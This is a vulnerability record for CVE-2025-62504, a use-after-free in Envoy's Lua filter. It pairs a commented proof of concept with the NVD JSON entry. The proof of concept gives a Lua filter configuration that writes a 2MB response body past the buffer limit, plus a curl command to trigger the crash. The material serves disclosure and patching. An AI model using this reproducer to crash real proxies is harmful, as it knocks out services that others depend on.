CVE-2025-62504

-- CVE-2025-62504 PoC: Envoy Lua Filter Use-After-Free -- This Lua script triggers the vulnerability when executed in the response phase -- by rewriting the response body to exceed per_connection_buffer_limit_bytes (default 1MB) -- Envoy Lua filter configuration example: -- filter_chains: -- - filters: -- - name: envoy.filters.network.http_connection_manager -- typed_config: -- http_filters: -- - name: envoy.filters.http.lua -- typed_config: -- inline_code: | -- function envoy_on_response(response_handle) -- -- Generate a response body larger than per_connection_buffer_limit_bytes (1MB default) -- local large_body = string.rep("A", 2 * 1024 * 1024) -- 2MB body -- response_handle:body():setBytes(large_body) -- end -- per_connection_buffer_limit_bytes: 1048576 # 1MB default -- The vulnerability is triggered when: -- 1. A request is sent to the Envoy proxy with the Lua filter configured -- 2. The Lua script executes in the response phase -- 3. The rewritten response body exceeds per_connection_buffer_limit_bytes -- 4. Envoy generates a local reply with overriding headers -- 5. Dangling references to the original response body cause a crash -- To exploit: -- curl -v http://envoy-proxy:8080/ -- This triggers the Lua script execution and causes a use-after-free crash

{"cve": {"id": "CVE-2025-62504", "sourceIdentifier": "[email protected]", "published": "2025-10-16T22:15:31.527", "lastModified": "2025-10-29T19:19:16.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is an open source edge and service proxy. Envoy versions earlier than 1.36.2, 1.35.6, 1.34.10, and 1.33.12 contain a use-after-free vulnerability in the Lua filter. When a Lua script executing in the response phase rewrites a response body so that its size exceeds the configured per_connection_buffer_limit_bytes (default 1MB), Envoy generates a local reply whose headers override the original response headers, leaving dangling references and causing a crash. This results in denial of service. Updating to versions 1.36.2, 1.35.6, 1.34.10, or 1.33.12 fixes the issue. Increasing per_connection_buffer_limit_bytes (and for HTTP/2 the initial_stream_window_size) or increasing per_request_buffer_limit_bytes / request_body_buffer_limit can reduce the likelihood of triggering the condition but does not correct the underlying memory safety flaw."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.12", "matchCriteriaId": "50C4150D-8E29-49D4-8A55-017F19AF36C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.10", "matchCriteriaId": "54528CF8-8BFB-4428-8C61-EC347E808A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.6", "matchCriteriaId": "FDAA238B-81BE-4D15-BD97-5C4A93B2E181"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.2", "matchCriteriaId": "ECFEEDE9-7E5F-4FAF-810F-6E26F17AAB44"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-gcxr-6vrp-wff3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}